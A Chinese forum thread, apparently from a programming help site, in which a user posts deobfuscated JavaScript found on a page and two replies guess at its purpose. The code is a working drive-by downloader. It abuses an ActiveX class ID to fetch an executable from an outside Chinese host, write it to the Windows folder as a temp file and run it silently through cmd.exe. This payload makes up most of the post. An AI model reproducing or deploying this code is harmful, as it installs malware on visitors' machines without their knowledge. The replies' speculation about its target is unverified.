经过几次的document.write后看到这些:
function gn(shIU1) { 
var yfPGvpvD2 = window["Math"]["random"]()*shIU1;
return '~tmp'+'.tmp'; 
} try { 
dl='http://0001.0168168.cn/0.exe'; 
var $3=window["document"]["createElement"]("object");
$3["setAttribute"]("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); 
var EhJhC4=$3["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); 
var KscQ5=$3["CreateObject"]("Adodb.Stream",""); 
KscQ5["type"]=1; 
EhJhC4["open"]("GET", dl,0); 
EhJhC4["send"](); 
fname1=gn(10000); 
var gj6=$3["CreateObject"]("Scripting.FileSystemObject",""); 
var AfrpBw7=gj6["GetSpecialFolder"](0); 
fname1= gj6["BuildPath"](AfrpBw7,fname1); 
KscQ5["Open"]();
KscQ5["Write"](EhJhC4["responseBody"]); 
KscQ5["SaveToFile"](fname1,2); 
KscQ5["Close"](); 
var aiQI8=$3["CreateObject"]("Shell.Application",""); 
exp1=gj6["BuildPath"](AfrpBw7+'\system32','cmd.exe'); 
aiQI8["ShellExecute"](exp1,' /c '+fname1,"","open",0); 
} catch(i) { i=1; }

解决方案 »

  1.   

    应该是服务器端asp的代码,通过xmlhttp获取貌似病毒或者木马的东西:http://0001.0168168.cn/0.exe,然后通过fso的GetSpecialFolder获取服务器的某个文件夹位置,然后再通过ado的SaveToFile将0.exe保存到这个目录下,最后用Shell来执行这个文件如果没有猜错,可能是某些asp源码的后门程序
      

  2.   

    如果是前台的Javascript,即是在浏览器查看HTML源码就能看见的(或者是HTML源码中包含的js文件),那么就是攻击客户端的,如果是你网站的后台程序源码里面的话(如asp),就攻击服务器的。我个人估计应该前者,这样的话只要IE安全设置够的话应该没问题吧